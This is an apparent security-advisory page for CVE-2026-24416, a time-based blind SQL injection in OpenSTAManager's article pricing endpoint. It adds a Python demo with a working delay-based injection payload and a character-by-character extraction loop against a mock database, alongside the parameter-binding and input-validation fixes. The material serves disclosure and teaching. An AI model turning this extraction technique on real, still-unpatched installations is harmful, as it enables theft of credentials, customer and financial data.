VYPR
High severity · NVD Advisory · Published Feb 6, 2026 · Updated Feb 9, 2026

OpenSTAManager has a Time-Based Blind SQL Injection in Article Pricing Module

CVE-2026-24416

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The application fails to properly sanitize the idarticolo parameter before using it in SQL queries, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

OpenSTAManager v2.9.8 and earlier have a critical Time-Based Blind SQL Injection in the article pricing module, allowing authenticated attackers to extract sensitive data.

Vulnerability

Overview

OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The root cause is the failure to sanitize the idarticolo parameter before it is directly concatenated into a SQL query in /modules/articoli/ajax/complete.php at line 70. In contrast, other parameters like idanagrafica are properly sanitized using prepare(), highlighting an inconsistent application of secure coding practices [1].

Exploitation

Details

An authenticated attacker can exploit this vulnerability by sending a crafted GET request to the endpoint /ajax_complete.php?op=getprezzi with a malicious idarticolo parameter. The attacker does not need any special privileges beyond authentication. By using time-based Boolean inference, the attacker can extract data character by character, observing response delays to infer the truth of injected conditions [1].

Impact

Successful exploitation allows an attacker to extract the entire contents of the database, including user credentials, customer data, and financial records. This can lead to complete compromise of the application and exposure of sensitive business information [1][3].

Mitigation

Status

As of the advisory date, no official patch has been released for this vulnerability. Users are advised to monitor the project repository for updates and, in the interim, apply input validation or restrict access to the vulnerable endpoint to trusted users only [1].
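The following is an added example, not code from OpenSTAManager or from this advisory. It models in one place the three points above: the Overview's contrast between a concatenated idarticolo and a properly bound parameter, the Exploitation section's character-by-character inference from response delays, and the interim input-validation mitigation. The real handler is PHP against MySQL; Python with an in-memory SQLite database is used here so it runs offline, with a registered SLEEP() standing in for MySQL's. The table names (articoli, utenti), the 'admin' row, the handler names and the delay constants are all constructed for the demo and are not taken from the project.

```python
"""Added example (not OpenSTAManager code): a mock of the idarticolo injection,
the delay-based inference loop an attacker would run against it, and the two
fixes the Mitigation section suggests. Schema, rows and names are constructed."""
import sqlite3
import time

DELAY = 0.1            # seconds the injected SLEEP() stalls the query when the condition holds
THRESHOLD = DELAY / 2  # response time above which the oracle reads the condition as true


def build_db():
    """In-memory SQLite stand-in for the MySQL schema (hypothetical tables and rows)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the payload behaves as it would on MySQL.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE articoli(id INTEGER PRIMARY KEY, prezzo REAL);
        INSERT INTO articoli VALUES (1, 9.5), (2, 12.0);
        CREATE TABLE utenti(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO utenti VALUES (1, 'admin', 'not-a-real-hash');
    """)
    return conn


def vulnerable_getprezzi(conn, idarticolo):
    """Vulnerable pattern: the request parameter is concatenated into the statement."""
    sql = "SELECT prezzo FROM articoli WHERE id = " + idarticolo
    return conn.execute(sql).fetchall()


def bound_getprezzi(conn, idarticolo):
    """Fix 1: bind the parameter, so its content is data and never SQL syntax."""
    return conn.execute("SELECT prezzo FROM articoli WHERE id = ?", (idarticolo,)).fetchall()


def validated_getprezzi(conn, idarticolo):
    """Fix 2 (interim input validation): accept only a decimal integer id, then bind it."""
    if not idarticolo.isdigit():
        raise ValueError("idarticolo must be a positive integer")
    return bound_getprezzi(conn, int(idarticolo))


def timed_oracle(handler, conn, condition):
    """Ask the server a yes/no question and read the answer from the response delay alone."""
    payload = f"1 AND (CASE WHEN ({condition}) THEN SLEEP({DELAY}) ELSE 0 END)"
    start = time.perf_counter()
    try:
        handler(conn, payload)
    except ValueError:
        pass  # the validating handler rejects the payload outright
    return time.perf_counter() - start >= THRESHOLD


def find_length(handler, conn, expr, max_len=32):
    """Smallest n for which LENGTH(expr) > n is false, i.e. the length of the leaked value."""
    for n in range(max_len):
        if not timed_oracle(handler, conn, f"LENGTH(({expr})) > {n}"):
            return n
    return max_len


def extract(handler, conn, expr, length):
    """Leak expr one character at a time, binary-searching each code point over printable ASCII."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL spelling would be ASCII(SUBSTRING(...)); SQLite uses UNICODE(SUBSTR(...)).
            if timed_oracle(handler, conn, f"UNICODE(SUBSTR(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Leak utenti.username through the vulnerable handler; confirm both fixes give the oracle nothing."""
    conn = build_db()
    target = "SELECT username FROM utenti WHERE id = 1"
    length = find_length(vulnerable_getprezzi, conn, target)
    leaked = extract(vulnerable_getprezzi, conn, target, length)
    oracle_on_bound = timed_oracle(bound_getprezzi, conn, "1=1")
    oracle_on_validated = timed_oracle(validated_getprezzi, conn, "1=1")
    return leaked, oracle_on_bound, oracle_on_validated


if __name__ == "__main__":
    print(demo())  # ('admin', False, False)
```

Each oracle call costs one request, and only the true branches pay the sleep, so the binary search over code points keeps the cost near seven requests per character; on a real network the threshold has to sit well above the normal response-time jitter, and repeating ambiguous probes is the usual remedy. Against the bound and validated handlers the CASE expression is never parsed as SQL, so every probe returns promptly and the attacker learns nothing from timing.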

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: devcode-it/openstamanager (Packagist)
Affected versions: <= 2.9.8
Patched versions: none listed

Affected products: 2

Patches: 0 (no patches discovered yet)


References: 3

News mentions: 0 (no linked articles in our index yet)